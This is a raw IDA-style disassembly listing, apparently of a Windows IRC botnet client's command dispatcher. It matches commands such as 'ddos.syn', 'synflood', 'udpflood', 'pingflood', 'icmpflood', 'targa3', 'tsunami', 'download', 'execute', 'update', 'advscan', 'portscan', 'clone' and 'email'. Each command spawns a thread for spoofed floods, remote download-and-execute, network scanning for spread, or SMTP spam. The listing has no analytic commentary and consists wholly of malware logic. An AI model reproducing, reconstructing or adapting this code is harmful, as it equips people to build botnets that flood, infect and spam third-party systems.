push [ebp+4Ch+arg_0]
push 4
jmp short loc_406A33
; ---------------------------------------------------------------------------
loc_406A9B: ; CODE XREF: sub_40274D+4345�j
push [ebp+4Ch+var_8]
push offset aPause ; "pause"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_406AB8
push [ebp+4Ch+arg_0]
push 5
jmp loc_406A33
; ---------------------------------------------------------------------------
loc_406AB8: ; CODE XREF: sub_40274D+435F�j
push [ebp+4Ch+var_8]
push offset aContinue ; "continue"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_406AD5
push [ebp+4Ch+arg_0]
push 6
jmp loc_406A33
; ---------------------------------------------------------------------------
loc_406AD5: ; CODE XREF: sub_40274D+437C�j
push [ebp+4Ch+var_8]
push offset aDelete ; "delete"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_406AF2
push [ebp+4Ch+arg_0]
push 1
jmp loc_406A33
; ---------------------------------------------------------------------------
loc_406AF2: ; CODE XREF: sub_40274D+4399�j
push [ebp+4Ch+var_8]
push offset aShare ; "share"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_406B6C
cmp edi, ebx
jz short loc_406B3C
cmp [ebp+4Ch+var_904], bl
jz short loc_406B17
push ebx
push edi
push 1
jmp short loc_406B1D
; ---------------------------------------------------------------------------
loc_406B17: ; CODE XREF: sub_40274D+43C2�j
push [ebp+esi+4Ch+var_98]
push edi
push ebx
loc_406B1D: ; CODE XREF: sub_40274D+43C8�j
call sub_41BFBE
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset aS ; "%s"
push eax
call sub_41E6A6
add esp, 18h
jmp loc_406C4D
; ---------------------------------------------------------------------------
loc_406B3C: ; CODE XREF: sub_40274D+43BA�j
push ebx
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_41C07C
add esp, 10h
test eax, eax
lea eax, [ebp+4Ch+var_2D0]
jz short loc_406B62
push offset unk_42E08C
jmp loc_406C45
; ---------------------------------------------------------------------------
loc_406B62: ; CODE XREF: sub_40274D+4409�j
push offset unk_42E06C
jmp loc_406C45
; ---------------------------------------------------------------------------
loc_406B6C: ; CODE XREF: sub_40274D+43B6�j
push [ebp+4Ch+var_8]
push offset aUser_0 ; "user"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_406BF4
cmp edi, ebx
jz short loc_406BCA
cmp [ebp+4Ch+var_904], bl
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
jz short loc_406B9A
push ebx
push edi
push 1
jmp short loc_406BAB
; ---------------------------------------------------------------------------
loc_406B9A: ; CODE XREF: sub_40274D+4445�j
mov esi, [ebp+esi+4Ch+var_98]
cmp esi, ebx
jz short loc_406BA7
push esi
push edi
push ebx
jmp short loc_406BAB
; ---------------------------------------------------------------------------
loc_406BA7: ; CODE XREF: sub_40274D+4453�j
push ebx
push edi
push 2
loc_406BAB: ; CODE XREF: sub_40274D+444B�j
; sub_40274D+4458�j
call sub_41C19B
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset aS ; "%s"
push eax
call sub_41E6A6
add esp, 24h
jmp loc_406C4D
; ---------------------------------------------------------------------------
loc_406BCA: ; CODE XREF: sub_40274D+4434�j
push ebx
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_41C265
add esp, 10h
test eax, eax
lea eax, [ebp+4Ch+var_2D0]
jz short loc_406BED
push offset unk_42E04C
jmp short loc_406C45
; ---------------------------------------------------------------------------
loc_406BED: ; CODE XREF: sub_40274D+4497�j
push offset unk_42E02C
jmp short loc_406C45
; ---------------------------------------------------------------------------
loc_406BF4: ; CODE XREF: sub_40274D+4430�j
push [ebp+4Ch+var_8]
push offset aSend ; "send"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_406C3A
cmp edi, ebx
jz short loc_406C33
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
push [ebp+4Ch+arg_0]
call sub_41BE8A
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset aS ; "%s"
push eax
call sub_41E6A6
add esp, 1Ch
jmp short loc_406C4D
; ---------------------------------------------------------------------------
loc_406C33: ; CODE XREF: sub_40274D+44BC�j
push offset unk_42E008
jmp short loc_406C3F
; ---------------------------------------------------------------------------
loc_406C3A: ; CODE XREF: sub_40274D+44B8�j
push offset unk_42DFEC
loc_406C3F: ; CODE XREF: sub_40274D+2C4D�j
; sub_40274D+42A3�j ...
lea eax, [ebp+4Ch+var_2D0]
loc_406C45: ; CODE XREF: sub_40274D+4325�j
; sub_40274D+432F�j ...
push eax
call sub_41E6A6
pop ecx
pop ecx
loc_406C4D: ; CODE XREF: sub_40274D+42AB�j
; sub_40274D+4300�j ...
cmp [ebp+4Ch+var_C], ebx
jnz short loc_406C6B
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 14h
loc_406C6B: ; CODE XREF: sub_40274D+27A3�j
; sub_40274D+27D7�j ...
mov esi, [ebp+4Ch+arg_24]
loc_406C6E: ; CODE XREF: sub_40274D+65C6�j
; sub_40274D+7503�j ...
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_417D70
pop ecx
mov eax, esi
jmp loc_402B95
; ---------------------------------------------------------------------------
loc_406C82: ; CODE XREF: sub_40274D+4288�j
push edi
push offset aCapture ; "capture"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40968E
push edi
push offset aCap ; "cap"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40968E
push edi
push offset aGethost ; "gethost"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4095B9
push edi
push offset aGh ; "gh"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4095B9
loc_406CD6: ; CODE XREF: sub_40274D+39D7�j
; sub_40274D+3A06�j ...
mov edi, [ebp+esi+4Ch+var_9C]
cmp edi, ebx
mov [ebp+4Ch+var_20], edi
jz loc_402B92
push [ebp+4Ch+var_10]
push offset aKilllog ; "killlog"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40959F
push [ebp+4Ch+var_10]
push offset aKl ; "kl"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40959F
push [ebp+4Ch+var_10]
push offset aAddalias ; "addalias"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40955E
push [ebp+4Ch+var_10]
push offset aAa ; "aa"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40955E
push [ebp+4Ch+var_10]
push offset aPrivmsg_0 ; "privmsg"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409504
push [ebp+4Ch+var_10]
push offset aPm ; "pm"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409504
push [ebp+4Ch+var_10]
push offset aAction ; "action"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409492
push [ebp+4Ch+var_10]
push offset aA ; "a"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409492
push [ebp+4Ch+var_10]
push offset aCycle ; "cycle"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409434
push [ebp+4Ch+var_10]
push offset aCy ; "cy"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409434
push [ebp+4Ch+var_10]
push offset aMode ; "mode"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4093FB
push [ebp+4Ch+var_10]
push offset aM_0 ; "m"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4093FB
push [ebp+4Ch+var_10]
push offset aC_raw ; "c_raw"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40938F
push [ebp+4Ch+var_10]
push offset aC_r ; "c_r"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40938F
push [ebp+4Ch+var_10]
push offset aC_mode ; "c_mode"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40930C
push [ebp+4Ch+var_10]
push offset aC_m ; "c_m"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40930C
push [ebp+4Ch+var_10]
push offset aC_nick ; "c_nick"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4092A4
push [ebp+4Ch+var_10]
push offset aC_n ; "c_n"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4092A4
push [ebp+4Ch+var_10]
push offset aC_join ; "c_join"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409281
push [ebp+4Ch+var_10]
push offset aC_j ; "c_j"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409281
push [ebp+4Ch+var_10]
push offset aC_part ; "c_part"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409243
push [ebp+4Ch+var_10]
push offset aC_p ; "c_p"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409243
push [ebp+4Ch+var_10]
push offset aTarga3 ; "targa3"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409151
push [ebp+4Ch+var_10]
push offset aT3 ; "t3"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409151
push [ebp+4Ch+var_10]
push offset aTsunami ; "tsunami"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409083
push [ebp+4Ch+var_10]
push offset aTsn ; "tsn"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409083
push [ebp+4Ch+var_10]
push offset aRepeat ; "repeat"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_408FCA
push [ebp+4Ch+var_10]
push offset aRp ; "rp"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_408FCA
push [ebp+4Ch+var_10]
push offset aDelay ; "delay"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_408F39
push [ebp+4Ch+var_10]
push offset aDe ; "de"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_408F39
push [ebp+4Ch+var_10]
push offset aUpdate ; "update"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_408DC3
push [ebp+4Ch+var_10]
push offset aUp ; "up"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_408DC3
push [ebp+4Ch+var_10]
push offset aExecute ; "execute"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_408D2A
push [ebp+4Ch+var_10]
push offset aE ; "e"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_408D2A
push [ebp+4Ch+var_10]
push offset aFindfile ; "findfile"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_408C21
push [ebp+4Ch+var_10]
push offset aFf ; "ff"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_408C21
push [ebp+4Ch+var_10]
push offset aRename ; "rename"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_408BCD
push [ebp+4Ch+var_10]
push offset aMv ; "mv"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_408BCD
push [ebp+4Ch+var_10]
push offset aIcmpflood ; "icmpflood"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_408AD6
push [ebp+4Ch+var_10]
push offset aIcmp ; "icmp"
call sub_41E990
test eax, eax
pop ecx
pop ecx
loc_407077: ; DATA XREF: seg002:0043F244�o
; seg002:0043F258�o ...
jz loc_408AD6
mov eax, [ebp+esi+4Ch+var_98]
cmp eax, ebx
mov [ebp+4Ch+arg_0], eax
jz loc_402B92
push [ebp+4Ch+var_10]
push offset aClone_0 ; "clone"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4089EF
push [ebp+4Ch+var_10]
push offset aC ; "c"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4089EF
push [ebp+4Ch+var_10]
push offset aDdos_syn ; "ddos.syn"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4088D6
push [ebp+4Ch+var_10]
push offset aDdos_ack ; "ddos.ack"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4088D6
push [ebp+4Ch+var_10]
push offset aDdos_random ; "ddos.random"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4088D6
push [ebp+4Ch+var_10]
push offset aWisdom_udp ; "wisdom.udp"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_4071DF
push 7Fh
pop esi
push esi
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_3070]
push eax
call sub_41E860
push esi
lea eax, [ebp+4Ch+var_2FF0]
push edi
push eax
call sub_41E860
push esi
push [ebp+4Ch+arg_0]
lea eax, [ebp+4Ch+var_2F70]
push eax
call sub_41E860
push esi
push [ebp+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2EF0]
push eax
call sub_41E860
mov eax, [ebp+4Ch+var_C]
mov edi, [ebp+4Ch+var_4]
mov esi, [ebp+4Ch+arg_4]
push ebx
mov [ebp+4Ch+var_2E68], eax
lea eax, [ebp+4Ch+var_2D0]
push 13h
push eax
mov [ebp+4Ch+var_2E6C], edi
mov [ebp+4Ch+var_3074], esi
call sub_40AE85
add esp, 3Ch
mov [ebp+4Ch+var_2E70], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_3074]
push eax
push offset loc_4175F3
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_2E70]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_4071D2
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42DE68
jmp loc_40491A
; ---------------------------------------------------------------------------
loc_4071CA: ; CODE XREF: sub_40274D+4A8B�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4071D2: ; CODE XREF: sub_40274D+4A6A�j
cmp [ebp+4Ch+var_2E64], ebx
jz short loc_4071CA
jmp loc_404929
; ---------------------------------------------------------------------------
loc_4071DF: ; CODE XREF: sub_40274D+49C3�j
push [ebp+4Ch+var_10]
push offset aSynflood ; "synflood"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4087F2
push [ebp+4Ch+var_10]
push offset aSyn ; "syn"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4087F2
push [ebp+4Ch+var_10]
push offset aSkysyn ; "skysyn"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_407308
push 7Fh
pop esi
push esi
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_3498]
push eax
call sub_41E860
push esi
lea eax, [ebp+4Ch+var_3418]
push edi
push eax
call sub_41E860
push esi
push [ebp+4Ch+arg_0]
lea eax, [ebp+4Ch+var_3398]
push eax
call sub_41E860
push esi
push [ebp+4Ch+var_9C]
lea eax, [ebp+4Ch+var_3318]
push eax
call sub_41E860
push [ebp+4Ch+arg_0]
mov eax, [ebp+4Ch+var_4]
mov esi, [ebp+4Ch+arg_4]
push edi
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_3294], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_3290], eax
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42DE20
push eax
mov [ebp+4Ch+var_349C], esi
call sub_41E6A6
add esp, 44h
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 10h
push eax
call sub_40AE85
add esp, 0Ch
mov [ebp+4Ch+var_3298], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_349C]
push eax
push offset loc_41640E
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_3298]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_4072FB
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset dword_42DDE4
jmp loc_4089B1
; ---------------------------------------------------------------------------
loc_4072F3: ; CODE XREF: sub_40274D+4BB4�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4072FB: ; CODE XREF: sub_40274D+4B93�j
cmp [ebp+4Ch+var_328C], ebx
jz short loc_4072F3
jmp loc_4089C0
; ---------------------------------------------------------------------------
loc_407308: ; CODE XREF: sub_40274D+4AD1�j
push [ebp+4Ch+var_10]
push offset aPhatwonk ; "phatwonk"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40870E
push [ebp+4Ch+var_10]
push offset aWonk ; "wonk"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40870E
push [ebp+4Ch+var_10]
push offset aDownload ; "download"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4085D7
push [ebp+4Ch+var_10]
push offset aDl ; "dl"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4085D7
push [ebp+4Ch+var_10]
push offset aRedirect ; "redirect"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4084E1
push [ebp+4Ch+var_10]
push offset aRd ; "rd"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4084E1
push [ebp+4Ch+var_10]
push offset aScan_0 ; "scan"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4083F2
push [ebp+4Ch+var_10]
push offset aSc ; "sc"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4083F2
push [ebp+4Ch+var_10]
push offset aC_privmsg ; "c_privmsg"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4082F0
push [ebp+4Ch+var_10]
push offset aC_pm ; "c_pm"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4082F0
push [ebp+4Ch+var_10]
push offset aC_action ; "c_action"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4081FB
push [ebp+4Ch+var_10]
push offset aC_a ; "c_a"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4081FB
mov eax, [ebp+esi+4Ch+var_94]
cmp eax, ebx
mov [ebp+4Ch+var_14], eax
jz loc_402B92
push [ebp+4Ch+var_10]
push offset aPortscan ; "portscan"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4080F9
push [ebp+4Ch+var_10]
push offset aPsc ; "psc"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4080F9
push [ebp+4Ch+var_10]
push offset aAdvscan ; "advscan"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_407C2E
push [ebp+4Ch+var_10]
push offset aAsc ; "asc"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_407C2E
push [ebp+4Ch+var_10]
push offset aUdpflood ; "udpflood"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_407B12
push [ebp+4Ch+var_10]
push offset aUdp ; "udp"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_407B12
push [ebp+4Ch+var_10]
push offset aU ; "u"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_407B12
push [ebp+4Ch+var_10]
push offset aNetsend ; "netsend"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4079FF
push [ebp+4Ch+var_10]
push offset aNs ; "ns"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4079FF
push [ebp+4Ch+var_10]
push offset aPingflood ; "pingflood"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4078DC
push [ebp+4Ch+var_10]
push offset aPing_0 ; "ping"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4078DC
push [ebp+4Ch+var_10]
push offset aP ; "p"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4078DC
push [ebp+4Ch+var_10]
push offset aTcpflood ; "tcpflood"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40773D
push [ebp+4Ch+var_10]
push offset aTcp ; "tcp"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40773D
push [ebp+4Ch+var_10]
push offset aEmail ; "email"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_4076E8
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_47F4]
push eax
call sub_41EEC0
push edi
call sub_41E7AD
push [ebp+4Ch+arg_0]
mov [ebp+4Ch+var_20], eax
lea eax, [ebp+4Ch+var_4090]
push eax
call sub_41EEC0
push [ebp+4Ch+var_14]
lea eax, [ebp+4Ch+var_4390]
push eax
call sub_41EEC0
push offset asc_42FCE0 ; " "
push offset a_ ; "_"
push [ebp+esi+4Ch+var_90]
call sub_41AB7D
push eax
lea eax, [ebp+4Ch+var_4290]
push eax
call sub_41EEC0
add esp, 30h
lea eax, [ebp+4Ch+var_5590]
push eax
push 101h
call ds:dword_444110 ; WSAStartup
lea eax, [ebp+4Ch+var_47F4]
push eax
call ds:dword_444168 ; gethostbyname
push 6
push 1
push 2
mov edi, eax
call ds:dword_444100 ; socket
push [ebp+4Ch+var_20]
mov esi, eax
mov [ebp+4Ch+var_324], 2
mov eax, [edi+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+4Ch+var_320], eax
call ds:dword_444260 ; htons
mov [ebp+4Ch+var_322], ax
lea eax, [ebp+4Ch+var_4290]
push eax
lea eax, [ebp+4Ch+var_4090]
push eax
lea eax, [ebp+4Ch+var_4290]
push eax
lea eax, [ebp+4Ch+var_4390]
push eax
lea eax, [ebp+4Ch+var_4090]
push eax
lea eax, [ebp+4Ch+var_5990]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax
call sub_41E6A6
add esp, 1Ch
push 10h
lea eax, [ebp+4Ch+var_324]
push eax
push esi
call ds:dword_4440AC ; connect
push ebx
mov edi, 100h
push edi
lea eax, [ebp+4Ch+var_4190]
push eax
push esi
call ds:dword_444064 ; recv
lea eax, [ebp+4Ch+var_4190]
push ebx
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+4Ch+var_5990]
push eax
push esi
call ds:dword_4441A0 ; send
push ebx
push edi
lea eax, [ebp+4Ch+var_4190]
push eax
push esi
call ds:dword_444064 ; recv
push esi
call ds:dword_444218 ; closesocket
call ds:dword_444224 ; WSACleanup
lea eax, [ebp+4Ch+var_4390]
push eax
push offset unk_42DCA4
loc_4076D4: ; CODE XREF: sub_40274D+2C5C�j
; sub_40274D+636F�j ...
lea eax, [ebp+4Ch+var_2D0]
loc_4076DA: ; CODE XREF: sub_40274D+6671�j
push eax
call sub_41E6A6
loc_4076E0: ; CODE XREF: sub_40274D+226D�j
add esp, 0Ch
jmp loc_406C4D
; ---------------------------------------------------------------------------
loc_4076E8: ; CODE XREF: sub_40274D+4E31�j
push [ebp+4Ch+var_10]
push offset aHttpcon ; "httpcon"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz short loc_407712
push [ebp+4Ch+var_10]
push offset aHcon ; "hcon"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_407C7B
loc_407712: ; CODE XREF: sub_40274D+4FAC�j
push [ebp+esi+4Ch+var_90]
push [ebp+4Ch+var_14]
push [ebp+4Ch+arg_0]
push edi
call sub_41E7AD
pop ecx
push eax
push [ebp+4Ch+var_8]
push [ebp+4Ch+var_C]
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_4128A1
jmp loc_40A0AE
; ---------------------------------------------------------------------------
loc_40773D: ; CODE XREF: sub_40274D+4E03�j
; sub_40274D+4E1A�j
push [ebp+4Ch+var_8]
mov esi, 80h
lea eax, [ebp+4Ch+var_135C]
push esi
push eax
call sub_41E6FE
lea eax, [ebp+4Ch+var_135C]
push eax
push offset aSyn ; "syn"
call sub_41E990
add esp, 14h
test eax, eax
jz short loc_4077A2
lea eax, [ebp+4Ch+var_135C]
push eax
push offset aAck ; "ack"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz short loc_4077A2
lea eax, [ebp+4Ch+var_135C]
push eax
push offset aRandom_0 ; "random"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz short loc_4077A2
push offset unk_42DC5C
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_4077A2: ; CODE XREF: sub_40274D+501B�j
; sub_40274D+5032�j ...
push [ebp+4Ch+var_14]
call sub_41E7AD
cmp eax, ebx
pop ecx
mov [ebp+4Ch+var_1254], eax
jle loc_4078C4
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_135C]
push esi
push eax
call sub_41E6FE
push edi
lea eax, [ebp+4Ch+var_13DC]
push esi
push eax
call sub_41E6FE
push [ebp+4Ch+arg_0]
call sub_41E7AD
push [ebp+4Ch+var_9C]
mov [ebp+4Ch+var_1258], eax
xor eax, eax
cmp [ebp+4Ch+var_8F6], bl
push esi
setnz al
mov [ebp+4Ch+var_1250], eax
mov eax, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_13E0], eax
lea eax, [ebp+4Ch+var_12DC]
push eax
call sub_41E6FE
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_124C], eax
mov eax, [ebp+4Ch+var_C]
add esp, 28h
cmp [ebp+4Ch+var_1250], ebx
mov [ebp+4Ch+var_1248], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_407836
mov eax, offset aNormal ; "Normal"
loc_407836: ; CODE XREF: sub_40274D+50E2�j
push [ebp+4Ch+var_14]
push [ebp+4Ch+arg_0]
push edi
push [ebp+4Ch+var_8]
push eax
push offset unk_42DC18
lea eax, [ebp+4Ch+var_2D0]
push 200h
push eax
call sub_41E6FE
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 14h
push eax
call sub_40AE85
add esp, 2Ch
mov [ebp+4Ch+var_125C], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_13E0]
push eax
push offset loc_416B1E
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_125C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_4078B7
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42DBE0
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_4078AF: ; CODE XREF: sub_40274D+5170�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4078B7: ; CODE XREF: sub_40274D+514F�j
cmp [ebp+4Ch+var_1244], ebx
jz short loc_4078AF
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_4078C4: ; CODE XREF: sub_40274D+5066�j
push offset unk_42DBA8
loc_4078C9: ; CODE XREF: sub_40274D+1E23�j
; sub_40274D+1E39�j ...
lea eax, [ebp+4Ch+var_2D0]
loc_4078CF: ; CODE XREF: sub_40274D+4042�j
push eax
call sub_41E6A6
pop ecx
pop ecx
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_4078DC: ; CODE XREF: sub_40274D+4DBE�j
; sub_40274D+4DD5�j ...
cmp ds:dword_444294, ebx
jnz loc_4079E4
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_FFC], eax
mov eax, [ebp+4Ch+var_4]
push 7Fh
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_1000], eax
lea eax, [ebp+4Ch+var_1094]
push eax
call sub_41E860
push edi
call sub_41E7AD
push [ebp+4Ch+arg_0]
mov [ebp+4Ch+var_1014], eax
call sub_41E7AD
push [ebp+4Ch+var_14]
mov [ebp+4Ch+var_1010], eax
call sub_41E7AD
push 7Fh
push [ebp+4Ch+var_9C]
mov [ebp+4Ch+var_100C], eax
lea eax, [ebp+4Ch+var_1114]
push eax
call sub_41E860
push [ebp+4Ch+var_100C]
mov eax, [ebp+4Ch+arg_4]
push [ebp+4Ch+var_1010]
mov [ebp+4Ch+var_1118], eax
lea eax, [ebp+4Ch+var_1094]
push eax
push [ebp+4Ch+var_1014]
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42DB60
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 16h
push eax
call sub_40AE85
add esp, 48h
mov [ebp+4Ch+var_1004], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_1118]
push eax
push offset word_415F82
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_1004]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_4079D7
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42DB24
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_4079CF: ; CODE XREF: sub_40274D+5290�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4079D7: ; CODE XREF: sub_40274D+526F�j
cmp [ebp+4Ch+var_FF8], ebx
jz short loc_4079CF
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_4079E4: ; CODE XREF: sub_40274D+5195�j
push 1FFh
lea eax, [ebp+4Ch+var_2D0]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax
call sub_41E860
jmp loc_40698A
; ---------------------------------------------------------------------------
loc_4079FF: ; CODE XREF: sub_40274D+4D90�j
; sub_40274D+4DA7�j
push edi
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_2D0]
push [ebp+4Ch+arg_0]
push offset unk_42DAD0
push eax
call sub_41E6A6
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
push [ebp+4Ch+arg_0]
call sub_41E1C0
push edi
mov [ebp+4Ch+var_24], eax
call sub_41E1C0
